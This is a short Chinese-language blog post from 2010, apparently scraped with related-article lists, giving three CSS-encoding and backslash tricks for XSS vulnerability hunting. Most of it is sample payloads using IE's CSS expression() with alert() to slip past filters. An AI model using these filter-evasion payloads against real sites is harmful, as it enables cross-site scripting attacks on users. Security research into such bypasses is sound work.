XSS挖漏洞 - CSS編碼和反斜槓的三個技巧
在XSS的漏洞挖掘中編碼和反斜槓也是須要掌握的基本方法,這裏給出XSS漏洞挖掘中採用CSS編碼和反斜槓的三個技巧。express
做者&譯者:wpulog瀏覽器
2010/07/17xss
技巧1、改變編碼中0的數量 (\0X -> \00000X)。ide
例如:編碼
<p style="xss:\65xpression(alert(/wpulog/))">it
<p style="xss:\065xpression(alert(/wpulog/))">io
<p style="xss:\0065xpression(alert(/wpulog/))">class
效果是同樣的。技巧
技巧2、改變編碼字符的大小寫(\0A -> \0a)。方法
例如:
<p style="xss:expression(alert(/wpulog/))\x0d">
<p style="xss:expression(alert(/wpulog/))\x0D">
效果是同樣的。
技巧3、編碼字符的後邊能夠添加空白符(IE支持\x20, \x09;FF和Opera支持\x0A, \x0D)。
例如:在IE中<p sytle="xss:\65 xpression(alert(/wpulog/))">一樣可以運行,\65與x之間是空格。
另外,CSS中在字母前添加反斜槓會被忽略,如\x等同於x,主要\n不等於n。在火狐中也可在換行符(\x0A,\X0D)前添加反斜槓,如:
<div style="xx:\gg">
在IE中CSS屬性值能夠插入空字符(\0),例如:曾經的網易郵箱Webmail XSS漏洞
<p style="xss:ex�pression(alert(/wpulog/)">。
不一樣的瀏覽器可能支持不一樣的編碼方式,如在火狐瀏覽器中不支持對括號進行編碼。而IE支持對括號編碼,如:<p style="xss:expression\28alert\28/wpulog/\29\29">在IE中可正常執行。
這些技巧能夠結合其餘的一些編碼方法混合使用,也許在XSS的漏洞挖掘中會收到意外的效果。
[+]Reference:
~~~~~~~~~
http://heideri.ch/jso/#61
- 1. 正斜槓/ 和反斜槓'
- 2. 斜槓'/' 和反斜槓'\'
- 3. Python中的左斜槓、右斜槓(正斜槓和反斜槓)
- 4. [Asp.net]c#中的斜槓和反斜槓
- 5. JS-斜槓和反斜槓的轉換
- 6. xss漏洞挖掘
- 7. Gmail的三個XSS漏洞
- 8. XSS漏洞
- 9. 漏洞挖掘之xss
- 10. 斜槓與反斜槓的區別
- 更多相關文章...
- • Markdown 高級技巧 - Markdown 教程
- • XML 編碼 - XML 教程
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
- • IntelliJ IDEA 代碼格式化配置和快捷鍵
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 正斜槓/ 和反斜槓'
- 2. 斜槓'/' 和反斜槓'\'
- 3. Python中的左斜槓、右斜槓(正斜槓和反斜槓)
- 4. [Asp.net]c#中的斜槓和反斜槓
- 5. JS-斜槓和反斜槓的轉換
- 6. xss漏洞挖掘
- 7. Gmail的三個XSS漏洞
- 8. XSS漏洞
- 9. 漏洞挖掘之xss
- 10. 斜槓與反斜槓的區別